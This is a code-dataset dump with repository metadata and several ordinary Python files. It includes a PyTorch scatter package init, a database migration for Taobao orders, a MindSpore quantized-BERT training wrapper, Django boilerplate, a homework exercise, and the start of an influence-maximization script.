blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 2 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 69 | license_type stringclasses 2
values | repo_name stringlengths 5 118 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringlengths 4 63 | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 2.91k 686M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 23
values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 220
values | src_encoding stringclasses 30
values | language stringclasses 1
value | is_vendor bool 2
classes | is_generated bool 2
classes | length_bytes int64 2 10.3M | extension stringclasses 257
values | content stringlengths 2 10.3M | authors listlengths 1 1 | author_id stringlengths 0 212 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
ec5779ee0e273f9ab8b597108e3e042acb1ccd27 | 591900bf248906d0c80fbb02174b0c3be6de376f | /torch_scatter/__init__.py | e43f88eefbc902eb16d43b425fbd5f348a6e202f | [
"MIT"
] | permissive | xychen9459/pytorch_scatter | 0e02a2028faa98acc30fa3b7b082ea52cab5f70c | b9570ccd71622f9a7b2d311a1607bb3914801743 | refs/heads/master | 2020-04-17T00:09:30.541736 | 2018-12-27T11:37:55 | 2018-12-27T11:37:55 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 444 | py | from .add import scatter_add
from .sub import scatter_sub
from .mul import scatter_mul
from .div import scatter_div
from .mean import scatter_mean
from .std import scatter_std
from .max import scatter_max
from .min import scatter_min
__version__ = '1.1.0'
__all__ = [
'scatter_add',
'scatter_sub',
'scatter_mul',
'scatter_div',
'scatter_mean',
'scatter_std',
'scatter_max',
'scatter_min',
'__version__',
]
| [
"matthias.fey@tu-dortmund.de"
] | matthias.fey@tu-dortmund.de |
4e0fa240c27baaa6dccf933cc096661b4781f451 | 895e098c97866710843e7da03e8eb094c4e08b3c | /migrations/versions/fdae8a8a7871_.py | 9e465e5084fd279aca54dd7644cb598a91bb4146 | [] | no_license | aqrun/taojiji | eb3716ed7664ea1c25c9bfa244aad19cc2e17e3d | 0ffef9001bfc79ec9eae9550831c8095cfd66187 | refs/heads/master | 2020-08-15T23:23:16.275926 | 2020-03-13T01:20:23 | 2020-03-13T01:20:23 | 215,422,963 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,083 | py | """empty message
Revision ID: fdae8a8a7871
Revises:
Create Date: 2019-10-24 23:44:09.359342
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = 'fdae8a8a7871'
down_revision = None
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table('files',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('user_id', sa.Integer(), nullable=False),
sa.Column('name', sa.String(length=250), nullable=False),
sa.Column('uri', sa.String(length=250), nullable=False),
sa.Column('extension', sa.String(length=32), nullable=True),
sa.Column('location', sa.String(length=32), nullable=False),
sa.Column('status', sa.Integer(), nullable=True),
sa.Column('created_at', sa.DateTime(), nullable=True),
sa.Column('updated_at', sa.DateTime(), nullable=True),
sa.PrimaryKeyConstraint('id')
)
op.create_table('role',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('name', sa.String(length=80), nullable=True),
sa.Column('description', sa.String(length=250), nullable=True),
sa.PrimaryKeyConstraint('id'),
sa.UniqueConstraint('name')
)
op.create_table('taobao_orders',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('order_id', sa.String(length=64), nullable=False, comment='订单编号'),
sa.Column('buyer_company_name', sa.String(length=250), nullable=True, comment='买家公司名'),
sa.Column('buyer_username', sa.String(length=128), nullable=True, comment='买家会员名'),
sa.Column('seller_company_name', sa.String(length=250), nullable=True, comment='卖家会员名'),
sa.Column('seller_username', sa.String(length=128), nullable=True, comment='卖家会员名'),
sa.Column('price', sa.DECIMAL(precision=10, scale=2), nullable=True, comment='货品总价'),
sa.Column('shipping_fee', sa.DECIMAL(precision=10, scale=2), nullable=True, comment='运费'),
sa.Column('discount', sa.DECIMAL(precision=10, scale=2), nullable=True, comment='折扣或涨价'),
sa.Column('real_price', sa.DECIMAL(precision=10, scale=2), nullable=True, comment='实付款'),
sa.Column('status', sa.String(length=128), nullable=True, comment='订单状态'),
sa.Column('create_time', sa.DateTime(), nullable=True, comment='订单创建时间'),
sa.Column('payment_time', sa.DateTime(), nullable=True, comment='订单付款时间'),
sa.Column('sender', sa.String(length=250), nullable=True, comment='发货方'),
sa.Column('receiver_name', sa.String(length=128), nullable=True, comment='收货人姓名'),
sa.Column('receiver_address', sa.String(length=250), nullable=True, comment='收货地址'),
sa.Column('receiver_postcode', sa.String(length=20), nullable=True, comment='邮编'),
sa.Column('receiver_phone', sa.String(length=250), nullable=True, comment='联系电话'),
sa.Column('receiver_cellphone', sa.String(length=250), nullable=True, comment='联系手机'),
sa.Column('product_category', sa.String(length=20), nullable=True, comment='货品种类'),
sa.Column('comment', sa.String(length=250), nullable=True, comment='买家留言'),
sa.Column('logistic_company_name', sa.String(length=250), nullable=True, comment='物流公司'),
sa.Column('logistic_bill_number', sa.String(length=64), nullable=True, comment='物流单号'),
sa.Column('created_at', sa.DateTime(), nullable=True),
sa.Column('updated_at', sa.DateTime(), nullable=True),
sa.PrimaryKeyConstraint('id'),
sa.UniqueConstraint('order_id')
)
op.create_table('user',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('email', sa.String(length=250), nullable=True),
sa.Column('username', sa.String(length=128), nullable=True),
sa.Column('password', sa.String(length=128), nullable=True),
sa.Column('last_login_at', sa.DateTime(), nullable=True),
sa.Column('current_login_at', sa.DateTime(), nullable=True),
sa.Column('last_login_ip', sa.String(length=100), nullable=True),
sa.Column('current_login_ip', sa.String(length=100), nullable=True),
sa.Column('login_count', sa.Integer(), nullable=True),
sa.Column('active', sa.Boolean(), nullable=True),
sa.Column('confirmed_at', sa.DateTime(), nullable=True),
sa.PrimaryKeyConstraint('id'),
sa.UniqueConstraint('email')
)
op.create_table('roles_users',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('user_id', sa.Integer(), nullable=True),
sa.Column('role_id', sa.Integer(), nullable=True),
sa.ForeignKeyConstraint(['role_id'], ['role.id'], ),
sa.ForeignKeyConstraint(['user_id'], ['user.id'], ),
sa.PrimaryKeyConstraint('id')
)
op.create_table('taobao_products',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('order_id', sa.String(length=64), nullable=True),
sa.Column('product_name', sa.String(length=250), nullable=True, comment='货品标题'),
sa.Column('unit_price', sa.DECIMAL(precision=10, scale=2), nullable=True, comment='单价'),
sa.Column('quantity', sa.Integer(), nullable=True, comment='数量'),
sa.Column('unit', sa.String(length=20), nullable=True, comment='单位'),
sa.Column('product_code', sa.String(length=128), nullable=True, comment='货号'),
sa.Column('spec', sa.String(length=32), nullable=True, comment='型号'),
sa.Column('wuliao_code', sa.String(length=32), nullable=True, comment='物料编号'),
sa.Column('danpin_code', sa.String(length=32), nullable=True, comment='单品货号'),
sa.ForeignKeyConstraint(['order_id'], ['taobao_orders.order_id'], ondelete='CASCADE'),
sa.PrimaryKeyConstraint('id')
)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_table('taobao_products')
op.drop_table('roles_users')
op.drop_table('user')
op.drop_table('taobao_orders')
op.drop_table('role')
op.drop_table('files')
# ### end Alembic commands ###
| [
"aqrun@sina.com"
] | aqrun@sina.com |
ac35f0bcc030ddf42a3ceca0aca26e8cd742efbf | bf7f457e73780694af1c688f55fac3ba2413e82f | /model_zoo/research/nlp/ternarybert/src/cell_wrapper.py | 2c505b9db0401f08666782cf11c471914f5d774b | [
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0",
"LicenseRef-scancode-proprietary-license",
"LGPL-2.1-only",
"Libpng",
"IJG",
"Zlib",
"MIT",
"MPL-2.0",
"BSD-3-Clause-Open-MPI",
"MPL-2.0-no-copyleft-exception",
"BSD-3-Clause",
"LicenseRef-scancode-warranty-disclaimer",
"AGPL-3... | permissive | chncwang/mindspore | 974441b85c9edc1e1ce30e086e9d33fb1ab2052c | 6dac92aedf0aa1541d181e6aedab29aaadc2dafb | refs/heads/master | 2023-03-10T11:13:31.752406 | 2021-03-02T11:21:09 | 2021-03-02T11:21:09 | 343,701,879 | 0 | 0 | Apache-2.0 | 2021-03-02T11:56:25 | 2021-03-02T08:38:28 | null | UTF-8 | Python | false | false | 23,500 | py | # Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Train Cell."""
import mindspore.nn as nn
from mindspore import context
from mindspore.ops import operations as P
from mindspore.ops import functional as F
from mindspore.ops import composite as C
from mindspore.common.tensor import Tensor
from mindspore.common import dtype as mstype
from mindspore.common.parameter import Parameter
from mindspore.communication.management import get_group_size
from mindspore.nn.wrap.grad_reducer import DistributedGradReducer
from mindspore.context import ParallelMode
from mindspore.train.serialization import load_checkpoint, load_param_into_net
from .tinybert_model import BertModelCLS
from .quant import QuantizeWeightCell
from .config import gradient_cfg
class ClipByNorm(nn.Cell):
r"""
Clips tensor values to a maximum :math:`L_2`-norm.
The output of this layer remains the same if the :math:`L_2`-norm of the input tensor
is not greater than the argument clip_norm. Otherwise the tensor will be normalized as:
.. math::
\text{output}(X) = \frac{\text{clip_norm} * X}{L_2(X)},
where :math:`L_2(X)` is the :math:`L_2`-norm of :math:`X`.
Args:
axis (Union[None, int, tuple(int)]): Compute the L2-norm along the Specific dimension.
Default: None, all dimensions to calculate.
Inputs:
- **input** (Tensor) - Tensor of shape N-D. The type must be float32 or float16.
- **clip_norm** (Tensor) - A scalar Tensor of shape :math:`()` or :math:`(1)`.
Or a tensor shape can be broadcast to input shape.
Outputs:
Tensor, clipped tensor with the same shape as the input, whose type is float32.
Supported Platforms:
``Ascend`` ``GPU``
Examples:
>>> net = nn.ClipByNorm()
>>> input = Tensor(np.random.randint(0, 10, [4, 16]), mindspore.float32)
>>> clip_norm = Tensor(np.array([100]).astype(np.float32))
>>> output = net(input, clip_norm)
>>> print(output.shape)
(4, 16)
"""
def __init__(self):
super(ClipByNorm, self).__init__()
self.reduce_sum = P.ReduceSum(keep_dims=True)
self.select_ = P.Select()
self.greater_ = P.Greater()
self.cast = P.Cast()
self.sqrt = P.Sqrt()
self.max_op = P.Maximum()
self.shape = P.Shape()
self.reshape = P.Reshape()
self.fill = P.Fill()
self.expand_dims = P.ExpandDims()
self.dtype = P.DType()
def construct(self, x, clip_norm):
"""add ms_function decorator for pynative mode"""
mul_x = F.square(x)
if mul_x.shape == (1,):
l2sum = self.cast(mul_x, mstype.float32)
else:
l2sum = self.cast(self.reduce_sum(mul_x), mstype.float32)
cond = self.greater_(l2sum, 0)
ones_ = self.fill(self.dtype(cond), self.shape(cond), 1.0)
l2sum_safe = self.select_(cond, l2sum, self.cast(ones_, self.dtype(l2sum)))
l2norm = self.select_(cond, self.sqrt(l2sum_safe), l2sum)
intermediate = x * clip_norm
max_norm = self.max_op(l2norm, clip_norm)
values_clip = self.cast(intermediate, mstype.float32) / self.expand_dims(max_norm, -1)
values_clip = self.reshape(values_clip, self.shape(x))
values_clip = F.identity(values_clip)
return values_clip
clip_grad = C.MultitypeFuncGraph("clip_grad")
# pylint: disable=consider-using-in
@clip_grad.register("Number", "Number", "Tensor")
def _clip_grad(clip_type, clip_value, grad):
"""
Clip gradients.
Inputs:
clip_type (int): The way to clip, 0 for 'value', 1 for 'norm'.
clip_value (float): Specifies how much to clip.
grad (tuple[Tensor]): Gradients.
Outputs:
tuple[Tensor], clipped gradients.
"""
if clip_type != 0 and clip_type != 1:
return grad
dt = F.dtype(grad)
if clip_type == 0:
new_grad = C.clip_by_value(grad, F.cast(F.tuple_to_array((-clip_value,)), dt),
F.cast(F.tuple_to_array((clip_value,)), dt))
else:
new_grad = ClipByNorm()(grad, F.cast(F.tuple_to_array((clip_value,)), dt))
return new_grad
grad_scale = C.MultitypeFuncGraph("grad_scale")
reciprocal = P.Reciprocal()
@grad_scale.register("Tensor", "Tensor")
def tensor_grad_scale(scale, grad):
return grad * reciprocal(scale)
class ClipGradients(nn.Cell):
"""
Clip gradients.
Inputs:
grads (list): List of gradient tuples.
clip_type (Tensor): The way to clip, 'value' or 'norm'.
clip_value (Tensor): Specifies how much to clip.
Returns:
List, a list of clipped_grad tuples.
"""
def __init__(self):
super(ClipGradients, self).__init__()
self.clip_by_norm = nn.ClipByNorm()
self.cast = P.Cast()
self.dtype = P.DType()
def construct(self,
grads,
clip_type,
clip_value):
"""clip gradients"""
if clip_type != 0 and clip_type != 1:
return grads
new_grads = ()
for grad in grads:
dt = self.dtype(grad)
if clip_type == 0:
t = C.clip_by_value(grad, self.cast(F.tuple_to_array((-clip_value,)), dt),
self.cast(F.tuple_to_array((clip_value,)), dt))
else:
t = self.clip_by_norm(grad, self.cast(F.tuple_to_array((clip_value,)), dt))
new_grads = new_grads + (t,)
return new_grads
class SoftmaxCrossEntropy(nn.Cell):
"""SoftmaxCrossEntropy loss"""
def __init__(self):
super(SoftmaxCrossEntropy, self).__init__()
self.log_softmax = P.LogSoftmax(axis=-1)
self.softmax = P.Softmax(axis=-1)
self.reduce_mean = P.ReduceMean()
self.cast = P.Cast()
def construct(self, predicts, targets):
likelihood = self.log_softmax(predicts)
target_prob = self.softmax(targets)
loss = self.reduce_mean(-target_prob * likelihood)
return self.cast(loss, mstype.float32)
class BertNetworkWithLoss(nn.Cell):
"""
Provide bert pre-training loss through network.
Args:
teacher_config (BertConfig): The config of BertModel.
is_training (bool): Specifies whether to use the training mode.
use_one_hot_embeddings (bool): Specifies whether to use one-hot for embeddings. Default: False.
Returns:
Tensor, the loss of the network.
"""
def __init__(self, teacher_config, teacher_ckpt, student_config, student_ckpt,
is_training, task_type, num_labels, use_one_hot_embeddings=False,
temperature=1.0, dropout_prob=0.1):
super(BertNetworkWithLoss, self).__init__()
# load teacher model
self.teacher = BertModelCLS(teacher_config, False, num_labels, dropout_prob,
use_one_hot_embeddings, "teacher")
param_dict = load_checkpoint(teacher_ckpt)
new_param_dict = {}
for key, value in param_dict.items():
new_key = 'teacher.' + key
new_param_dict[new_key] = value
load_param_into_net(self.teacher, new_param_dict)
# no_grad
self.teacher.set_train(False)
params = self.teacher.trainable_params()
for param in params:
param.requires_grad = False
# load student model
self.bert = BertModelCLS(student_config, is_training, num_labels, dropout_prob,
use_one_hot_embeddings, "student")
param_dict = load_checkpoint(student_ckpt)
new_param_dict = {}
for key, value in param_dict.items():
new_key = 'bert.' + key
new_param_dict[new_key] = value
load_param_into_net(self.bert, new_param_dict)
self.cast = P.Cast()
self.teacher_layers_num = teacher_config.num_hidden_layers
self.student_layers_num = student_config.num_hidden_layers
self.layers_per_block = int(self.teacher_layers_num / self.student_layers_num)
self.is_att_fit = student_config.is_att_fit
self.is_rep_fit = student_config.is_rep_fit
self.is_lgt_fit = student_config.is_lgt_fit
self.task_type = task_type
self.temperature = temperature
self.loss_mse = nn.MSELoss()
self.lgt_fct = nn.SoftmaxCrossEntropyWithLogits(sparse=True, reduction='mean')
self.select = P.Select()
self.zeroslike = P.ZerosLike()
self.dtype = student_config.dtype
self.num_labels = num_labels
self.soft_cross_entropy = SoftmaxCrossEntropy()
self.compute_type = student_config.compute_type
self.embedding_bits = student_config.embedding_bits
self.weight_bits = student_config.weight_bits
self.weight_clip_value = student_config.weight_clip_value
self.reshape = P.Reshape()
def construct(self,
input_ids,
input_mask,
token_type_id,
label_ids):
"""task distill network with loss"""
# teacher model
teacher_seq_output, teacher_att_output, teacher_logits, _ = self.teacher(input_ids, token_type_id, input_mask)
# student model
student_seq_output, student_att_output, student_logits, _ = self.bert(input_ids, token_type_id, input_mask)
total_loss = 0
if self.is_att_fit:
selected_teacher_att_output = ()
selected_student_att_output = ()
for i in range(self.student_layers_num):
selected_teacher_att_output += (teacher_att_output[(i + 1) * self.layers_per_block - 1],)
selected_student_att_output += (student_att_output[i],)
att_loss = 0
for i in range(self.student_layers_num):
student_att = selected_student_att_output[i]
teacher_att = selected_teacher_att_output[i]
student_att = self.select(student_att <= self.cast(-100.0, mstype.float32),
self.zeroslike(student_att),
student_att)
teacher_att = self.select(teacher_att <= self.cast(-100.0, mstype.float32),
self.zeroslike(teacher_att),
teacher_att)
att_loss += self.loss_mse(student_att, teacher_att)
total_loss += att_loss
if self.is_rep_fit:
selected_teacher_seq_output = ()
selected_student_seq_output = ()
for i in range(self.student_layers_num + 1):
selected_teacher_seq_output += (teacher_seq_output[i * self.layers_per_block],)
selected_student_seq_output += (student_seq_output[i],)
rep_loss = 0
for i in range(self.student_layers_num + 1):
student_rep = selected_student_seq_output[i]
teacher_rep = selected_teacher_seq_output[i]
rep_loss += self.loss_mse(student_rep, teacher_rep)
total_loss += rep_loss
if self.task_type == 'classification':
cls_loss = self.soft_cross_entropy(student_logits / self.temperature, teacher_logits / self.temperature)
if self.is_lgt_fit:
student_logits = self.cast(student_logits, mstype.float32)
label_ids_reshape = self.reshape(self.cast(label_ids, mstype.int32), (-1,))
lgt_loss = self.lgt_fct(student_logits, label_ids_reshape)
total_loss += lgt_loss
else:
student_logits = self.reshape(student_logits, (-1,))
label_ids = self.reshape(label_ids, (-1,))
cls_loss = self.loss_mse(student_logits, label_ids)
total_loss += cls_loss
return self.cast(total_loss, mstype.float32)
class BertTrainWithLossScaleCell(nn.Cell):
"""
Specifically defined for finetuning where only four inputs tensor are needed.
"""
def __init__(self, network, optimizer, scale_update_cell=None):
super(BertTrainWithLossScaleCell, self).__init__(auto_prefix=False)
self.network = network
self.network.set_grad()
self.weights = optimizer.parameters
self.optimizer = optimizer
self.grad = C.GradOperation(get_by_list=True,
sens_param=True)
self.reducer_flag = False
self.allreduce = P.AllReduce()
self.parallel_mode = context.get_auto_parallel_context("parallel_mode")
if self.parallel_mode in [ParallelMode.DATA_PARALLEL, ParallelMode.HYBRID_PARALLEL]:
self.reducer_flag = True
self.grad_reducer = F.identity
self.degree = 1
if self.reducer_flag:
self.degree = get_group_size()
self.grad_reducer = DistributedGradReducer(optimizer.parameters, False, self.degree)
self.clip_type = gradient_cfg.clip_type
self.clip_value = gradient_cfg.clip_value
self.is_distributed = (self.parallel_mode != ParallelMode.STAND_ALONE)
self.cast = P.Cast()
self.alloc_status = P.NPUAllocFloatStatus()
self.get_status = P.NPUGetFloatStatus()
self.clear_before_grad = P.NPUClearFloatStatus()
self.reduce_sum = P.ReduceSum(keep_dims=False)
self.depend_parameter_use = P.ControlDepend(depend_mode=1)
self.base = Tensor(1, mstype.float32)
self.less_equal = P.LessEqual()
self.hyper_map = C.HyperMap()
self.loss_scale = None
self.loss_scaling_manager = scale_update_cell
if scale_update_cell:
self.loss_scale = Parameter(Tensor(scale_update_cell.get_loss_scale(), dtype=mstype.float32))
self.saved_params = self.weights.clone(prefix='saved')
self.length = len(self.weights)
self.quant_embedding_list = []
self.quant_weight_list = []
for i, key in enumerate(self.saved_params):
if 'embedding_lookup' in key.name:
self.quant_embedding_list.append(i)
elif 'weight' in key.name and 'dense_1' not in key.name:
self.quant_weight_list.append(i)
self.quant_embedding_list_length = len(self.quant_embedding_list)
self.quant_weight_list_length = len(self.quant_weight_list)
self.quantize_embedding = QuantizeWeightCell(num_bits=network.embedding_bits,
compute_type=network.compute_type,
clip_value=network.weight_clip_value)
self.quantize_weight = QuantizeWeightCell(num_bits=network.weight_bits,
compute_type=network.compute_type,
clip_value=network.weight_clip_value)
@C.add_flags(has_effect=True)
def construct(self,
input_ids,
input_mask,
token_type_id,
label_ids,
sens=None):
"""Defines the computation performed."""
weights = self.weights
saved = ()
for i in range(self.length):
saved = saved + (F.assign(self.saved_params[i], weights[i]),)
assign_embedding = ()
for i in range(self.quant_embedding_list_length):
quant_embedding = self.quantize_embedding(weights[self.quant_embedding_list[i]])
assign_embedding = assign_embedding + (F.assign(weights[self.quant_embedding_list[i]], quant_embedding),)
F.control_depend(saved, assign_embedding[i])
assign_weight = ()
for i in range(self.quant_weight_list_length):
quant_weight = self.quantize_weight(weights[self.quant_weight_list[i]])
assign_weight = assign_weight + (F.assign(weights[self.quant_weight_list[i]], quant_weight),)
F.control_depend(saved, assign_weight[i])
for i in range(self.quant_embedding_list_length):
F.control_depend(assign_embedding[i], input_ids)
for i in range(self.quant_weight_list_length):
F.control_depend(assign_weight[i], input_ids)
if sens is None:
scaling_sens = self.loss_scale
else:
scaling_sens = sens
# alloc status and clear should be right before grad operation
init = self.alloc_status()
self.clear_before_grad(init)
grads = self.grad(self.network, weights)(input_ids,
input_mask,
token_type_id,
label_ids,
self.cast(scaling_sens,
mstype.float32))
F.control_depend(input_ids, grads)
# apply grad reducer on grads
grads = self.grad_reducer(grads)
grads = self.hyper_map(F.partial(grad_scale, scaling_sens * self.degree), grads)
grads = self.hyper_map(F.partial(clip_grad, self.clip_type, self.clip_value), grads)
restore = ()
for i in range(self.length):
restore = restore + (F.assign(weights[i], self.saved_params[i]),)
F.control_depend(grads, restore[i])
self.get_status(init)
flag_sum = self.reduce_sum(init, (0,))
if self.is_distributed:
# sum overflow flag over devices
flag_reduce = self.allreduce(flag_sum)
cond = self.less_equal(self.base, flag_reduce)
else:
cond = self.less_equal(self.base, flag_sum)
overflow = cond
if sens is None:
overflow = self.loss_scaling_manager(self.loss_scale, cond)
if overflow:
succ = False
else:
succ = self.optimizer(grads)
for i in range(self.length):
F.control_depend(restore[i], succ)
return succ
class BertTrainCell(nn.Cell):
"""
Specifically defined for finetuning where only four inputs tensor are needed.
"""
def __init__(self, network, optimizer, sens=1.0):
super(BertTrainCell, self).__init__(auto_prefix=False)
self.network = network
self.network.set_grad()
self.weights = optimizer.parameters
self.optimizer = optimizer
self.sens = sens
self.grad = C.GradOperation(get_by_list=True,
sens_param=True)
self.clip_type = gradient_cfg.clip_type
self.clip_value = gradient_cfg.clip_value
self.reducer_flag = False
self.parallel_mode = context.get_auto_parallel_context("parallel_mode")
if self.parallel_mode in [ParallelMode.DATA_PARALLEL, ParallelMode.HYBRID_PARALLEL]:
self.reducer_flag = True
self.grad_reducer = F.identity
self.degree = 1
if self.reducer_flag:
mean = context.get_auto_parallel_context("gradients_mean")
self.degree = get_group_size()
self.grad_reducer = DistributedGradReducer(optimizer.parameters, mean, self.degree)
self.is_distributed = (self.parallel_mode != ParallelMode.STAND_ALONE)
self.cast = P.Cast()
self.hyper_map = C.HyperMap()
self.saved_params = self.weights.clone(prefix='saved')
self.length = len(self.weights)
self.quant_embedding_list = []
self.quant_weight_list = []
for i, key in enumerate(self.saved_params):
if 'embedding_lookup' in key.name and 'min' not in key.name and 'max' not in key.name:
self.quant_embedding_list.append(i)
elif 'weight' in key.name and 'dense_1' not in key.name:
self.quant_weight_list.append(i)
self.quant_embedding_list_length = len(self.quant_embedding_list)
self.quant_weight_list_length = len(self.quant_weight_list)
self.quantize_embedding = QuantizeWeightCell(num_bits=network.embedding_bits,
compute_type=network.compute_type,
clip_value=network.weight_clip_value)
self.quantize_weight = QuantizeWeightCell(num_bits=network.weight_bits,
compute_type=network.compute_type,
clip_value=network.weight_clip_value)
def construct(self,
input_ids,
input_mask,
token_type_id,
label_ids):
"""Defines the computation performed."""
weights = self.weights
saved = ()
for i in range(self.length):
saved = saved + (F.assign(self.saved_params[i], weights[i]),)
assign_embedding = ()
for i in range(self.quant_embedding_list_length):
quant_embedding = self.quantize_embedding(weights[self.quant_embedding_list[i]])
assign_embedding = assign_embedding + (F.assign(weights[self.quant_embedding_list[i]], quant_embedding),)
F.control_depend(saved, assign_embedding[i])
assign_weight = ()
for i in range(self.quant_weight_list_length):
quant_weight = self.quantize_weight(weights[self.quant_weight_list[i]])
assign_weight = assign_weight + (F.assign(weights[self.quant_weight_list[i]], quant_weight),)
F.control_depend(saved, assign_weight[i])
for i in range(self.quant_embedding_list_length):
F.control_depend(assign_embedding[i], input_ids)
for i in range(self.quant_weight_list_length):
F.control_depend(assign_weight[i], input_ids)
grads = self.grad(self.network, weights)(input_ids,
input_mask,
token_type_id,
label_ids,
self.cast(F.tuple_to_array((self.sens,)),
mstype.float32))
F.control_depend(input_ids, grads)
# apply grad reducer on grads
grads = self.grad_reducer(grads)
grads = self.hyper_map(F.partial(clip_grad, self.clip_type, self.clip_value), grads)
restore = ()
for i in range(self.length):
restore = restore + (F.assign(weights[i], self.saved_params[i]),)
F.control_depend(grads, restore[i])
succ = self.optimizer(grads)
for i in range(self.length):
F.control_depend(restore[i], succ)
return succ
| [
"wutiancheng@huawei.com"
] | wutiancheng@huawei.com |
2997d35bb005e1e9c2f3ec505c3b4f4307f92e68 | 8993caba718c1e7478cbbb96f5a7c3b61aa38df8 | /manage.py | 4c68136c02a920fe8cd9d2a32acd88e9d94d29ea | [] | no_license | lsy-GitHub-Vc/automation-maintain-back-end | 3b4bc65d23907e90321a8b80c8751a5f87f1f5f3 | b312b290ef885cd263941b0523898e02f940091b | refs/heads/master | 2023-06-04T22:28:52.730717 | 2021-06-28T09:13:41 | 2021-06-28T09:13:41 | 372,755,960 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 634 | py | #!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'automatization.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
| [
"suliushy@163.com"
] | suliushy@163.com |
2020347cdcc3429271c093e8e7c6ef87a12c5d48 | bd2696ebd08022b8fa126d963661fdf0792e2a0c | /L05_packet_dir/Jobs_from_L05.py | 1fcbf7732bf7deb1924390a45dab7c1a752e924c | [
"MIT"
] | permissive | github-Ilfat/All_Lesson_of_Python | 653d737085c7f1bd381b2d704f280374edeab957 | fbab364fe91e05e08658662b16470a1809b6b2b0 | refs/heads/master | 2021-05-17T15:54:17.353396 | 2020-05-07T14:40:17 | 2020-05-07T14:40:17 | 250,856,289 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 977 | py | # LIGHT:
# Необходимо реализовать модуль divisor_master.
# Все функции модуля принимают на вход натуральные числа от 1 до 1000. Модуль содержит функции:
# 1) проверка числа на простоту (простые числа - это те числа у которых делители единица и они сами);
# 2) выводит список всех делителей числа;
# 3) выводит самый большой простой делитель числа.
# PRO:
# LIGHT +
# 4) функция выводит каноническое разложение числа
# (https://zaochnik.com/spravochnik/matematika/delimost/razlozhenie-chisel-na-prostye-mnozhiteli/) на простые множители;
# 5)функция выводит самый большой делитель (не обязательно простой) числа.
| [
"s-ilfat-h@mail.ru"
] | s-ilfat-h@mail.ru |
da4af6d6fb9bb9553d0b67e9a482b10c829848ca | eb6408409e2ccf7406bd03448aaa8c1c48aafcf0 | /Homework03/work05.py | 2470da240a6df6d850e09c4110fdf727b93b2b3a | [] | no_license | dvo1906/GeekBrainsPY | 734ae4a980a8635187a1dd0acf8cc8c9bff061f5 | ca72ade0bcb3e9b9aaf671e5395a7e323370b358 | refs/heads/master | 2022-12-01T10:58:45.611040 | 2020-08-19T09:14:48 | 2020-08-19T09:14:48 | 281,762,155 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,473 | py | # Задание-5:
# Программа запрашивает у пользователя строку чисел, разделенных
# пробелом. При нажатии Enter должна выводиться сумма чисел.
# Пользователь может продолжить ввод чисел, разделенных пробелом и
# снова нажать Enter. Сумма вновь введенных чисел будет добавляться
# к уже подсчитанной сумме. Но если вместо числа вводится специальный
# символ, выполнение программы завершается. Если специальный символ
# введен после нескольких чисел, то вначале нужно добавить сумму этих
# чисел к полученной ранее сумме и после этого завершить программу.
def my_sum():
sum_res = 0
ex = False
while ex == False:
number = input('Input numbers or Q for quit - ').split()
res = 0
for el in range(len(number)):
if number[el] == 'q' or number[el] == 'Q':
ex = True
break
else:
res = res + int(number[el])
sum_res = sum_res + res
print(f'Current sum is {sum_res}')
print(f'Your final sum is {sum_res}')
my_sum()
| [
"dvo1906@gmail.com"
] | dvo1906@gmail.com |
1237eff972e9df2990e7f52be55cc14caec946d7 | 53e8cbc1a18686576ecdfe0b7ab8905fb249560b | /CS303/Project/IMP/IMP.py | 1794c67dd156868c8e99ea35c18eefb5984f5769 | [] | no_license | Reallyee/AI-Notes | fe69bb0926be225895715645a980e4fbb3bf0f71 | 95620c5eb238808194e94395fb6162f33343969f | refs/heads/master | 2021-09-07T08:27:36.872016 | 2018-02-20T08:12:32 | 2018-02-20T08:12:32 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,813 | py | # -*- coding: utf-8 -*-
import numpy as num
import random
import sys
import time
from collections import defaultdict
import argparse
# 用来储存父节点-子节点键值对
nodes = defaultdict(dict) # 用来存 节点-节点 键值对 {start:{{end:weight},{end1,weight}}
nodes_amount = 0 # 节点的数量
edges_amount = 0
nodes_set = defaultdict(set)
start_time = 0
end_time = -sys.maxint
# 读入文件部分
def open_network_file(filename):
global nodes
global nodes_set
global nodes_amount
global edges_amount
f = open(filename, 'r')
index = 0
for line in f:
if index == 0:
nodes_amount = int(line.split(' ')[0])
edges_amount = int(line.split(' ')[1])
